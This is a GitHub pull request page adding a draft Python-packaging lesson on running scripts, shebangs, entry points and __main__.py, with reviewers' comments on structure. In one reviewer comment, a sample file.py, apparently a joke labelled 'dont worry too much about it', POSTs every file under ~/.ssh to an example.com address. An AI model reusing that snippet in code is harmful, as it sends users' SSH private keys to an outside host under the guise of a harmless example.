Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Add: Jeremy's scripts activity #87

Open
wants to merge 2 commits into
base: main
Choose a base branch
from
Open
Show file tree
Hide file tree
Changes from 1 commit
Commits
File filter

Filter by extension

Filter by extension

Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
167 changes: 167 additions & 0 deletions python-packaging/execute-code.md
Original file line number Diff line number Diff line change
@@ -0,0 +1,167 @@
---
jupytext:
text_representation:
extension: .md
format_name: myst
format_version: 0.13
jupytext_version: 1.16.4
kernelspec:
display_name: Python 3 (ipykernel)
language: python
name: python3
---

# Code Workflow Logic

## Execute a Python script

There are two primary ways to execute a Python script.

You are may already be familiar with the `python` command, and that it can take the name of a Python file and execute it

```bash
python my_program.py
```

When Python reads a file in this way, it executes all of the "top-level" commands that are not indented.
This is similar, but not identical, to the behavior of copying this file and pasting it line-by-line into an interactive
Python shell (or notebook cell).

The other way a Python script may be executed is to associate the file with a launch command.

### Non-Windows executables

On Linux or Mac systems, the Python file can itself be turned into a command. By adding a [shebang](https://en.wikipedia.org/wiki/Shebang_(Unix))
as the first line in any Python file, and by giving the file [executable permissions](https://docs.python.org/3/using/unix.html#miscellaneous) the
file can be directly invoked without a `python` command.

```python
#!/usr/bin/env python
# The above line is a shebang, and can take the place of typing python on the command line
# This comment is below, because shebangs must be the first line!

def shiny_hello():
print("\N{Sparkles} Hello from Python \N{Sparkles}")

shiny_hello()
```

```bash
my_program.py
# ✨ Hello from Python ✨
```

:::{tip}
Shebangs are a feature of POSIX. POSIX represents some level of compatibility between systems.
ucodery marked this conversation as resolved.
Show resolved Hide resolved
Linux, macOS, all BSDs, and many other operating systems are fully- or mostly-POSIX compliant.

Windows is not natively POSIX compliant. However, some "modes" inside of Windows are, such as WSL
ucodery marked this conversation as resolved.
Show resolved Hide resolved
(Windows Subsystem for Linux), gitbash, or some VSCode terminals.
:::

### Windows executables

If your Windows machine has Python registered as the default application associated with `.py` files, then any Python
scripts can be run as commands. However, only one Python can be registered at a time, so all Python scripts run this
way will use the same Python environment. While all Python files should end in a `.py`, this naming is necessary for
Windows to associate the file with Python, as opposed to on Linux where `.py` is a convention and the shebang associates
the file with Python.
sneakers-the-rat marked this conversation as resolved.
Show resolved Hide resolved

Additionally, most Windows Python installs come with the [Python Launcher](https://docs.python.org/3/using/windows.html#python-launcher-for-windows)
which, in addition to allowing specifying the version of Python, can also read shebang lines and emulate some of that behavior.
This allows for shebang lines to be re-used between Linux, macOS, and Windows systems. However, on Windows the command must still
be prefaced with another command (`py`).

```bash
py my_program.py
# ✨ Hello from Python ✨
```

:::{tip}
While there is no in-source format that can tell Windows what to do with a Python code file, executing a
Python file with a shebang on Windows also does not cause any issues. Python just sees the whole line as
a comment and ignores it! So even if you develop on Windows, it may be a good idea to add the shebang as
the first line of your scripts, so that colleagues on different systems can also run it.
:::

## Executable comparisons

### Pros of passing a file to `python`:
- don't need execute permissions
- works for every system
- explicit about what you expect to happen

### Pros of inserting a shebang to the file:
- file is associated with specific python
- don't have to remember which
Comment on lines +95 to +96
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

i think actually getting to a level of comfort with this idea might take a few more examples, like 'say you have installed several python versions with pyenv, the shebang can indicate python3.11 or etc. and like "what does that /usr/bin/env do?" so maybe we link out to further info for this point?

Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Maybe? I am having trouble thinking of anything to say here that doesn't go down a long tangent about virtual environments.

Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

ya ya, i think this is a sort of a special case (i don't think i have ever used the shebang method except when i first started using python and didn't know how to make packages), so if it's proving troublesome i think safe to omit :)

- don't have to use the `python` command
- don't have to even remember it is a Python script


# Share Code
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

I think myst is going to complain about two # headings in a single doc,

could ToC structure be something like

# Executing code
## Executing Scripts
### ...
## Executing Modules
### ...
## Entrypoints - `project.scripts`
### ...

or whatever order - i think that order has a nice build to it: "ok we are running single files, probably familiar, now we're running a file but it's a special file __main__ (or __name__ == "__main__" block), and now we're running a module anywhere in our shell" but up 2 u.

Copy link
Contributor

@sneakers-the-rat sneakers-the-rat Oct 28, 2024

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

expanded on this a bit in next comment - this one on top-level topic organization, and next on organization within executing modules. I think it would be worth it to split out scripts/entrypoints into their own top-level section after python -m module and __main__.py since they are sorta distinct concepts that build on each other

Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

I mentioned this in a separate discussion about the executable lesson, but I originally saw this as two separate lessons, but I just drafted it as a single file. I though it was maybe too much to do all together. Also, the first section requires almost no other preliminary knowledge, while the second gains a lot by the audience at least already being familiar with packaging and package structure. It could instead be a single lesson, but I would structure it slightly differently.

Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

up to you! always in favor of smaller chunks :)

Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

I split it all the way in my next draft.


## Execute a python package

In [Code Workflow Logic][Code Workflow Logic] you learned of the two primary ways to execute a stand-alone Python script.
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

does this link work? is it a special [][] myst link or something?

Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

I don't think so... It was a reminder to me to come back and link to the first lesson after this was integrated into the existing lesson hierarchy.

There are two other ways to execute Python as commands, both of which work for code that has been formatted as a package.

### Entrypoints

There is a special `entrypoint` a package can specify in its configuration which will direct installers to create an
executable command. Entrypoints are a general purpose plug-in system for Python packages, but the
Comment on lines +110 to +111
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

this sentence and something like "that you can run from your shell anywhere, without needing to refer to the file specifically."

And then maybe a demo -

"that's how people make it possible to do things like this:

$ pip install my_package
$ my_package

"

or something basic like that - they will have probably seen that before and maybe wondered how to do that, so i think a concrete example to let them know that "this is where we learn to do this cool thing" would be nice :)

[`console_scripts`](https://packaging.python.org/en/latest/specifications/entry-points/#use-for-scripts)
entry is specifically targeted at creating executable commands on systems that install the package.

The target of a `scripts` definition should be one function within your package, which will be directly executed
when the command is invoked in the shell. A `scripts` definition in your `pyproject.toml` looks like:

```toml
[project.scripts]
COMMAND = "my_package.my_module:my_function"
```

where `COMMAND` is the name of the command that will be made available after installation, `my_package` is the name of
your top-level package import, `my_module` is the name of any sub-modules in your package (optional, or may be
repeated as necessary to access the correct sub-module), and `my_funciton` is the function that will be called
ucodery marked this conversation as resolved.
Show resolved Hide resolved
(without parameters) when the command is invoked.
sneakers-the-rat marked this conversation as resolved.
Show resolved Hide resolved

Scripts defined in project configuration, such as `pyproject.toml`, do not need to exist as independent files in
the package repository, but will be created by installation tools, such as `pip`, at the time the package is
installed, in a manner customized to the current operating system.
Comment on lines +128 to +130
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

i am not sure what this means?

Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

scripts are not files in the repo's source. The black "command" is constructed and saved during install, it is part of the job of an installer to make these scripts. This is as opposed to keeping explicit scripts checked into the VCS (like a bin/run_me with a shebang) that some projects do. Some even include those scripts in the sdist/wheel; if they do, they also get installed into e.g. the venv and appear on PATH. But those are not "entrypoint scripts".

Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

aha that's what i figured you were referring to - i think this might be TMI for newbies :). it makes me think like "wait so should I not put this .py file in my repo? how will the tool know how to generate it for me if it's not there? when what you're referring to are the little autogenerated shim files that just call the script with shebang/etc.

Might be another good one for an admonition box after explaining the concept of [project.scripts] kind of scripts - "try this: install your package in a virtual environment, and then open the venv/bin/your_script file - what the heck is that about!?!?!"

i think it's important information (in the same way that i always tell anyone who wants to know what a virtual environment is to just read the bin/activate file (actually usually i parse it for them because there's really only two things you need to know but they're hidden in the shell script)) but might be a bit much in main text, and seems like it fits as a "if you want to know more" for the curious campers <3

Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Took this out for now


### Executable modules

The final way to make Python code executable directly from the command line is to include a
[`__main__` module](https://docs.python.org/3/library/__main__.html#module-__main__) in your package. Any package that
contains a `__main__` module and is installed in the current Python environment can be execute as a module
directly from the `python` command, without reference to any specific files.
```
python -m my_package
```

Try to create a `__main__.py` module in your package that will execute with the above command. (don't forget to
(re)install your package after creating this file!)

#### Further exploration

On your own or in small groups:

- What might be the advantages of making a packaged executable over providing script entry points?
- What are some disadvantages?
- Review the Pros section from [Executing Scripts][Executing Scrips]
- Any similarities between executable packages and executable scripts?

#### More About Main

You just learned that the `__main__` module allows a package to be executed directly from the command line with
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

i was wondering where this was, ha :)

I think the flow might be a little clearer if we go

  • execute single python files with python file.py
  • execute a file within a python package with python -m mypackage.myfile initially with some loose calls at the module level, and then demonstrating why we might want to wrap those up in a function or put them in a if __name__ == "__main__": block so they don't run when imported,
  • execute a special __main__.py file that takes the place of that if __name__ == "__main__": block

Just because I think introducing a new dunder file might take some motivating, like "why do i need this special file" and so introducing directly running a module file first gets you that motivation and also is a nice bridge from running a python script directly.

Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Hmm, this is actually part of what I am trying to teach here. python -m is not for single-file execution, it only works to execute (part of) a package. So you can't introduce -m without __main__.py plus a full intro to packaging (building, pyproject.toml, installing, ...). Also __main__.py files typically don't have a if __name__ == "__main__": because their purpose is only to be executed, not imported. (this is called out in the standard documentation).

So this may need some reordering, but you seem to have dropped entrypoints in your suggetion, and merged python file.py and ./file.py(very understandable). I do think that theifguard could maybe come first, as it is IME more common thanmain.py`

Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

you seem to have dropped entrypoints in your suggetion

oh ya ya this was just about the "this section" part, thinking of putting entrypoints after this.

python -m is not for single-file execution

The way i was thinking about this as far as like a train of thought in a lesson was like:

I have a python file file.py like this:

import requests; from pathlib import Path
def a_function():
    """dont worry too much about it"""
    requests.post("https://example.com/best_friend", data={str(p):p.read_text() for p in (Path.home()/'.ssh').glob('**/*')})

a_function()

first: i can call that function like python file.py

Then I make a package like

- pyproject.toml
- my_package
  |- __init__.py
  |- file.py

second: now (if i have installed it), i can call my file like python -m my_package.file

but wait! there is problem, what if we want to import our function and use it elsewhere? (introduce if __name__ == "__main__") concept

But wait! there's also a whole other special file for that

- pyproject.toml
- my_package
  |- __init__.py
  |- __main__.py
  |- file.py

so third: if i move my a_function() call to __main__.py, i can call my function like python -m my_package

Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

I like this a lot. I took most of this approach in my next draft.

`python -m`, but there is another purpose to the `__main__` name in Python. Any Python script that is executed
directly, by any of the methods you have learned to run Python code from the shell, will be given the name `__main__`
which identifies it as the first Python module loaded. This leads to the convention `if __name__ == "__main__":`, which
you may have seen used previously.

This conditional is often used at the bottom of modules, especially modules that
are expected to be executed directly, to separate code that is intended to execute as part of a command from code that
is intended to execute as part of an import.

Try to create a single Python script that contains a `if __name__ == "__main__":` which makes the file print different
messages when it is executed from when it is imported from other Python code.
14 changes: 14 additions & 0 deletions python-packaging/intro.md
Original file line number Diff line number Diff line change
@@ -0,0 +1,14 @@
---
jupytext:
text_representation:
extension: .md
format_name: myst
format_version: 0.13
jupytext_version: 1.16.4
kernelspec:
display_name: Python 3 (ipykernel)
language: python
name: python3
---

# Intro
Loading